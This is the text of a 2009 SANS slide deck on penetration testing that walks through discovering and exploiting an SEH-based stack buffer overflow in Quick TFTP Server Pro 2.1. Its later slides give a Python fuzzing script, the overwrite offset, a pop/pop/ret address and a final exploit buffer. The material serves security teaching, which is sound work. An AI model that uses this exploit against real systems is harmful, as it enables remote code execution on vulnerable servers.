Custom Penetration Testing

Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims

Advanced Penetration Testing - 2009 SANS

Objectives
Penetration Testing Precompiled Tools Targeting TFTP

Advanced Concepts

Testing a TFTP Server for Bugs Discovering the Bug Exploiting the TFTP Server

Advanced Penetration Testing - 2009 SANS

What is Penetration Testing?

Process of testing a target environment for weaknesses
More thorough than vulnerability scanning alone Validates findings by exploiting flaws Allows you to think like an attacker Various levels of interaction/depth
Advanced Penetration Testing - 2009 SANS
3

Types of Penetration Testing

Black-Box Penetration Testing
No access to source code No access provided to OS, architecture, etc More like an outsider attack scenario
More time consuming

Crystal-Box Penetration Testing

Tester given source code, system & network architecture and/or privileged system access More thorough than black-box testing Cost effective

Advanced Penetration Testing - 2009 SANS

Precompiled Tools
Pros
Can quickly be used Customer support Broad user community Often allow custom scripts or modules Limited in scope Only discover and test known vulnerabilities Skilled attackers are not relying solely on them Precompiled tools offer a sense of complacency Do not perform code coverage or do deep fuzzing

Cons

Advanced Penetration Testing - 2009 SANS

Targeting
General Steps
1. Determine Target Application and Operating System 2. Obtain a Copy of the Application 3. Analyze RFC and Communications Protocols 4. Discover and Record a Crash Condition 5. Analyze Crash Condition for Exploitation Opportunities

Advanced Penetration Testing - 2009 SANS

1) Determine Target Application and Operating System

What application/service are you analyzing?
What OS is it available for?
Which one(s) are you interested in?

What services does the application start up?

There may be several Scanning may help Analyze documentation and code if possible

Are the services proprietary or standards-based?

Proprietary often offer a lot of new opportunities

Advanced Penetration Testing - 2009 SANS

2) Obtain a Copy of the Application

Create a lab environment and install the application
Use the OS you are targeting Utilize Virtual Machines
Create snapshots prior to installation Install monitoring tools

Attempt to obtain the source code

Code analysis is often more complex than behavioral analysis, but valuable

Advanced Penetration Testing - 2009 SANS

3) Analyze RFC and Communications Protocols Is documentation available?

Programmers should follow RFCs
Search RFC for potential options and fields that may contain opportunities to cause a fault Understand each aspect of the protocols used by the application and relative behavior

Is architectural documentation available?

Advanced Penetration Testing - 2009 SANS
9

4) Discover and Record a Crash Condition

Are you properly monitoring?
Sniffers to record packets sent to the application
Wireshark/Tshark, tcpdump, etc Packets can be recorded and replayed

Debuggers to record application behavior while receiving/handling data

OllyDbg, Immunity Debugger, WinDbg

OS monitoring tools to monitor health

ProcMon, RegMon, FileMon, RegShot, etc

The condition must be repeatable Advanced Penetration Testing - 2009 SANS

10

5) Analyze Crash Condition for Exploitation Opportunities

What is happening during the crash?
Analyze the status of each register
Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting As

Is the Return Pointer or SEH chain being overwritten?

Analyze the stack segment and monitor ESP/EBP

Are heap pointers being overwritten?

Analyze dynamic memory allocations and behavior

Theres way more to analyze, but this is a start! Advanced Penetration Testing - 2009 SANS
11

Targeting (2)
Our goal is to discover and exploit a Windows Program vulnerability! The techniques well cover is applicable with any target or service Were targeting a TFTP service
Must understand how the protocol works Developers should follow RFCs
We can leverage the RFC as well

Could use fuzzing to automate bug discovery

Advanced Penetration Testing - 2009 SANS
12

Our TFTP Target

Quick TFTP Server Pro Version 2.1
Vulnerable to a stack-based buffer overflow
Can exploit by overwriting the Structured Exception Handling (SEH) chain Allows for DoS or code execution as System

TFTP Server Published by TallSoft Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security

Advanced Penetration Testing - 2009 SANS

13

TFTP
Trivial File Transfer Protocol (TFTP)
Simple protocol for transferring files over a network Clear-text protocol using UDP port 69 Used for transferring files by network devices, VOIP phones and other client-server programs
Advanced Penetration Testing - 2009 SANS
14

TFTP Behavior
Connection request is combined with either a read or write request Blocks of data are sent in a fixed 512 byte size
Each block must be acknowledged for error control

A block less than 512 bytes indicates the end of the stream
Advanced Penetration Testing - 2009 SANS
15

TFTP Behavior (2)

The first two bytes of a TFTP header indicates the request type and format
\x00\x01 \x00\x02 \x00\x03 \x00\x04 \x00\x05 \x00\x06 indicates a read request indicates a write request indicates the data block is an acknowledgement indicates an error is an optional acknowledgement
16

Advanced Penetration Testing - 2009 SANS

TFTP Behavior (3)

Read and Write request format:
\x00\x01 for read | \x00\x02 for write File Name Null byte - \x00 Mode Binary, ASCII or Mail Null byte - \x00
File Name file1.txt Null 0 Mode Octet Null 0

Example
Request Type Read \x00\x01

Advanced Penetration Testing - 2009 SANS

17

Hacking Quick TFTP Server

Quick TFTP Server Version 2.1
Install tftpserver_setup.exe onto a Windows XP Virtual Machine Use the TFTP information just covered to help with the investigation Attempt to crash the TFTP server while running in a debugger Create a custom script to start the testing Validate findings Attempt code execution

Advanced Penetration Testing - 2009 SANS

18

Tools We Need
Programming/Scripting Language
Python, Perl, Ruby, C

Debugger and Disassembler

OllyDbg, Immunity Debugger, IDAPro

Shellcode
Metasploit, Milw0rm, Custom

An open mind!
Knowledge of OS controls, Opcodes, Tricks Advanced Penetration Testing - 2009 SANS

19

Python
Object-oriented, High-level Programming Language Very Intuitive Very Modular No Manual Compilation Plays well with other languages C, C++, Jython, IronPython (.NET) Good Debugging
Advanced Penetration Testing - 2009 SANS
20

Tool: OllyDbg
Software Debugger for Windows
Author: Oleh Yuschuk

Shareware! Binary Code Analysis Register Contents, Procedures, API Calls, Patching, memory searching and more!

Advanced Penetration Testing - 2009 SANS

21

Hacking TFTP Hint #1

Consider the format of TFTP requests for your script
We covered the order a few slides ago Read & Write requests are often the easiest to attack as they have variable fields
They start with \x00\x01 & \x00\x02

The header format must be correct to trigger a valid response Command line scripting not always the best option
You may want to write a script

Advanced Penetration Testing - 2009 SANS

22

Hacking TFTP Hint #2

Where could a buffer overflow condition exist?
Try the request type field, file name and/or the mode Dont forget the nulls to terminate! Make sure youre watching the right thread in OllyDbg
Processes have multiple threads on Windows Advanced Penetration Testing - 2009 SANS
23

Hacking TFTP Hint #3

The easiest way is to use Python or Perl to open a socket and send your script
import socket import sys target = IP ADDRESS #Enter the right IP here port = 69 #Port for TFTP s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) cmd = "A"*10 #Enter the number of A's to send data = "\x00\x01"+ cmd #Modify this line to format your packet s.sendto(data, (target, port)) Advanced Penetration Testing - 2009 SANS
24

Quick TFTP Walk-Through

Start Quick TFTP Server with Olly Ignore entry point messages Press F9 once loaded Click OK on the demo pop-up
Advanced Penetration Testing - 2009 SANS
25

Quick TFTP Walk-Through (2)

This may be possible via command line, but
We need a script! Dont forget the formatting of TFTP read and write requests:
Request Type Read \x00\x01 File Name file1.txt Null 0 Mode Octet Null 0

The overflow is in the mode section!

Advanced Penetration Testing - 2009 SANS
26

Quick TFTP Walk-Through (3)

Write a python script that connects to the TFTP server with 1000 As

No Crash in Olly
Advanced Penetration Testing - 2009 SANS
27

Quick TFTP Walk-Through (4)

1060 As EIP is 41414141

Success!

Olly has paused

28

Advanced Penetration Testing - 2009 SANS

Quick TFTP Walk-Through (5)

What are we overwriting?
We overwrote the SEH Chain!

Lets do some math to see where the overflow is occurring

Advanced Penetration Testing - 2009 SANS
29

Quick TFTP Walk-Through (6)

Subtracting 41 As should take us to the SEH handler Lets give it a try by setting:
cmd = "A"*1023+"\xde\xc0\xad\xde"
We control EIP at 1023 bytes!

Advanced Penetration Testing - 2009 SANS

30

Quick TFTP Walk-Through (7)

We now need to find a valid pop/pop/ret instruction
Use the findjmp tool and experiment 0x77ec9cac is one I chose from kernel32.dll for XP SP1 Remember that you must compensate for SafeSEH if hacking XP SP2/SP3 Also remember that not every pop/pop/ret address will work. You gotta dig
Advanced Penetration Testing - 2009 SANS
31

Quick TFTP Walk-Through (8)

Finalizing our script
cmd = "A"*1019+"\xeb\x06\x90\x90"+"\xac\x9c\xec\x77"+"\x90"*4+sc data = "\x00\x01" + "blah" + "\x00"+cmd+"\x00

Our jmp and pointer

Our NOPs and shellcode

Advanced Penetration Testing - 2009 SANS

32

Advanced Concepts
Depending on the OS Version, a number of controls have been added
SafeSEH ASLR DEP
Protects SEH pointers against overwrites Randomizes locations of libraries and memory segments Prevents code execution on the stack and heap Pushes unique values onto the stack and heap during allocations which are checked upon exit or free

Security Cookies

Every byte in memory is a potential full or partial opcode

As long as the segment is executable

Advanced Penetration Testing - 2009 SANS

33

More Information
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stackprotection.pdf Preventing the Exploitation of SEH Overwrites by Skape Matt Miller http://www.uninformed.org/?v=5&a=2&t=pdf SEH Overwrites Simplified v1.01 by Aelphaeis Mangaraehttp://www.milw0rm.com/papers/187 Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa02/halvarflake-winsec02.ppt Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stackprotection.pdf Heap Feng Shui in JavaScript by Alexander Sotirov http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07sotirov-apr19.pdf Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32shellcode.pdf

Advanced Penetration Testing - 2009 SANS

34

End
Questions? SANS SEC709 Developing Exploits for Penetration Testers and Security Researchers stephen@deadlisting.com
Advanced Penetration Testing - 2009 SANS
35